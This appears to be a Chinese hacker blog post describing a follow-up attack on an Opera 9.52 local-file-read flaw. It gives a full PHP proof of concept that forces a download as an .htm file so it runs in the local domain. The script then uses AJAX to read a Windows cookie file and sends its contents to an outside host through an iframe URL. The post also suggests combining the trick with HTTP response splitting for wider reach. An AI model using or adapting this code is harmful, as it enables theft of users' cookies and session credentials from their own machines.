作者:空虚浪子心
在前文《opera9.52使用ajax读取本地文件漏洞》
中,提到了opera的ajax读取本地文件漏洞。
但是利用方式上,比较狭隘。
很少人会专门下载htm文件到本地,然后打开。
但是动态语言(php,asp等)只要修改header,就可以指定让用户下载。
我们设计如下代码的php文件:
b.php代码
<?/*opera 9.52 use ajax read local txt file and upload expwww.inbreak.netauthor kxlzx@xiaotou.org 2009-1-6*/header("Content-Disposition: attachment;filename=kxlzx.htm");header("Content-type: application/kxlzx");?><iframe id="framekxlzx" width=0 height=0></iframe><script>var xmlHttp;function createXMLHttp(){if(window.XMLHttpRequest){xmlHttp = new XMLHttpRequest();}else if(window.ActiveXObject){xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");}}function startRequest(doUrl){createXMLHttp();xmlHttp.onreadystatechange = handleStateChange;xmlHttp.open("GET", doUrl, true);xmlHttp.send(null);}function handleStateChange(){if (xmlHttp.readyState == 4 ){var strResponse = "";setTimeout("framekxlzxPost(xmlHttp.responseText)", 1000);}}function doMyAjax(user,file){var time = Math.random();var strPer = 'file://localhost/C:/Documents%20and%20Settings/'+user+'/Cookies/'+file+'?time='+time;startRequest(strPer);}function framekxlzxPost(text){document.getElementById('framekxlzx').src="http://www.inbreak.net/kxlzxtest/testxss/a.php?cookie="+escape(text);alert(/ok/);}doMyAjax('administrator','administrator@alibaba[1].txt');</script>其他代码和前文一致,但是多出了
header("Content-Disposition: attachment;filename=kxlzx.htm");
header("Content-type: application/kxlzx");
这段。
第一行定义http头,下载文件的文件名默认为kxlzx.htm。
因为如果你下载了其他类型的文件,windows会默认让其他类型的文件程序打开。
但是定义了htm文件名后,windows就会让opera打开这个文件。
注意,这里已经下载了文件,所以域属于本地域。
第二行定义了mm文件头(呃。。。),随便写了一个不存在的,opera就会自动下载该文件了。
使用opera打开测试地址:
http://www.inbreak.net/kxlzxtest/testxss/b.php
打开后,效果如图
我想,看到这个框,用户不管是点了打开还是点了保存,最终打开的时候,都是使用opera在本地域下打开的。
比较猥琐的利用方法。
更猥琐的方式,大家可以结合HTTP Response Splitting 攻击 ,在http头加上以上两段内容,利用范围更广。
原创文章如转载,请注明:转载自心动吧黑客BLOG [ http://www.abcxd.com/abcxd/ ]